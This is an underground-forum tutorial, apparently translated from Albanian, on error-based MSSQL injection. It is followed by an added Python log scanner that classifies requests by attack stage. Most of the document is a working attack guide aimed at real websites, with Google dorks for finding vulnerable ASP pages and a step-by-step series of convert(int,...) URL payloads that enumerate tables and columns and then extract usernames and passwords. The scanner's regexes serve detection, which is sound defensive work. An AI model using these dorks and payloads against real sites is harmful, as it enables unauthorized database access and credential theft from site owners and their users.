============================== MSSQL Injection Tutorial [ALB] ==============================

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

Hi. I just visited your webpage and I wrote this tutorial. It shows how you can use MSSQL-i to get to the important data. I wrote it in the Albanian language, so I hope that with this I can get you more Albanian visitors (HACKERS). There are a lot, but they aren't famous. Hope you will publish it. And coming soon in English. Waiting for your reply. :P Best wishes

***************************************************

In this tutorial I will show you how to reach a website's data using the MSSQL-i method.
In this tutorial we will use this type of attack: "ODBC Error Message Attack with CONVERT".

1. First we need to look for pages that are vulnerable.
---------------------------------------------------
Finding pages that are vulnerable is very easy :P. For this we can use Google :D.
We open www.google.com and search with DORKS. I took a few as examples; you can find plenty of others.
For example, we type:

inurl: "news.asp" "sub"
inurl: "games.asp" "id"
inurl: ".asp" "id"
....etc.

2. Now we need to test whether the page is vulnerable to MSSQL-i.
-------------------------------------------------------------
This is also very easy. It is done by adding the string (') after id=100.
If the page answers with an error, we know that it is vulnerable. Some of the most common responses are:

++++++++++++++++++++++++++++++++++++++++++++++
ODBC Microsoft Access Driver
Unclosed quotation mark
Microsoft OLE DB Provider for Oracle
Division by zero in
Microsoft OLE DB Provider for SQL Server error '80040e14'

And let's say we were given a response such as:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ') AND (Volgorde > 0) ORDER BY Volgorde'.
/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++

This means that the page is vulnerable to attack!!!

3. How do we find the version of the database (DB)?
------------------------------------------
If the URL looks like this:

www.localhost.com/lajmi.asp?id=100

then we append this part to the end:

+or+1=convert(int,(@@version))--

and in the end it becomes:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(@@version))--

And it gives us the response:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2) (VM) ' to data type int.
/msn/shared/includes/main_rub.asp, line 4

So we found the version! Now we go further :P

4. How to find the table names (table_name)
------------------------------------------------
To find the tables of a website with this method, we write, for example:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--

And an error will be shown to us, for example:

Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Users' to data type int.
/msn/shared/includes/main_rub.asp, line 4

So we found the first table. The first table is "Users". Now, to find the next table, for example:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--

And again the same kind of error will be shown to us, and it gives us the second table, for example:

Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'lajmet' to data type int.
/msn/shared/includes/main_rub.asp, line 4

So the second table is 'lajmet'. And we continue like this, in order, for the other tables.

5. How to discover column_names (the column names)
--------------------------------------------------
If we want to discover the column_name values for the table "Users", since this is most often where the users and passwords are, we go to:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--

And it should produce an error like this one:

Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'username' to data type int.
/msn/shared/includes/main_rub.asp, line 4

So the name of the first column of the table "Users" is "username".
Now we need to find the second column of the same table:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--

And it gives us the response (error):

Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'password' to data type int.
/msn/shared/includes/main_rub.asp, line 4

So we also found the name of the second column. The column_name is "password". Now, if we want, we can continue to find the next column_names, but these are the 2 most important things for a HACK!!
:D

6. How to get the data that interests us, e.g. (Username, Password, etc.) :P
-------------------------------------------------------------------------
In this part, all that needs to be done is to substitute the table (table_name) and the column names (column_name) that we found earlier into their places.
Let's substitute them now, for example:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 username from Users))--

And it gives us the response:

Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Admin' to data type int.
/msn/shared/includes/main_rub.asp, line 4

This means that the username is: Admin

Now we replace the first column "username" with the second column "password", for example:

www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 password from Users))--

And it gives us:

Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value '123456' to data type int.
/msn/shared/includes/main_rub.asp, line 4

This means that the password is: 123456

And we continue the same way for the other data.
So we have managed to obtain some of the information, such as the username/pass of a page.

username: Admin
password: 123456

I believe this will help you at least a little..
Happy hacking

*******************************************
Tuto by: **RoAd_KiLlEr**
*******************************************
Greetz to: Ton!WidnowS, Alboz-Crew, Inj3ct0r
*******************************************
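
The requests in steps 2 to 6 leave a recognizable trail in web server logs. The following Python scanner is an added example, not part of the original tutorial: it classifies each logged request by the step it corresponds to, so a responder can see how far an attempt progressed. The log layout, timestamps, sample lines and function names are constructed for illustration, and an HTTP 500 status is assumed to mean the conversion error was returned to the client.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: date time method uri-stem uri-query status (IIS-like layout)
SAMPLE_LOG = """\
2024-01-10 09:00:01 GET /lajmi.asp id=100 200
2024-01-10 09:00:05 GET /lajmi.asp id=100' 500
2024-01-10 09:00:09 GET /lajmi.asp id=100+or+1=convert(int,(@@version))-- 500
2024-01-10 09:00:14 GET /lajmi.asp id=100+or+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2024-01-10 09:00:20 GET /lajmi.asp id=100+or+1%3Dconvert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name%3D'Users'))-- 500
2024-01-10 09:00:31 GET /lajmi.asp id=100+or+1=convert(int,(select+top+1+username+from+Users))-- 500
2024-01-10 09:01:00 GET /search.asp q=convert+int+to+string 200
"""

CONVERT_INT = re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)
# Checked in this order, so the most specific pattern wins.
STAGES = [
    ("column-enumeration", re.compile(r"information_schema\.columns", re.I)),
    ("table-enumeration", re.compile(r"information_schema\.tables", re.I)),
    ("version-probe", re.compile(r"@@version", re.I)),
    ("data-extraction", re.compile(r"\bselect\b.+\bfrom\b", re.I)),
]
PROGRESS = ["quote-probe", "convert-probe", "version-probe", "table-enumeration", "column-enumeration", "data-extraction"]

def classify(query):
    """Return the stage a raw query string corresponds to, or None if benign."""
    q = unquote_plus(query)  # decode %XX and '+' before matching
    if CONVERT_INT.search(q):
        return next((s for s, p in STAGES if p.search(q)), "convert-probe")
    return "quote-probe" if q.count("'") % 2 else None  # unbalanced quote (step 2)

def scan(log_text):
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue  # header, comment or malformed line
        date, time, _method, stem, query, status = parts
        stage = classify(query)
        if stage:
            findings.append({"when": f"{date} {time}", "path": stem, "stage": stage, "error_returned": status == "500"})
    return findings

def furthest_stage(findings):
    """Deepest stage for which the server answered with an error (assumed leak)."""
    hit = [f["stage"] for f in findings if f["error_returned"]]
    return max(hit, key=PROGRESS.index, default=None)
```

Findings with error_returned set deserve priority, since this technique only yields data when the conversion error text reaches the client.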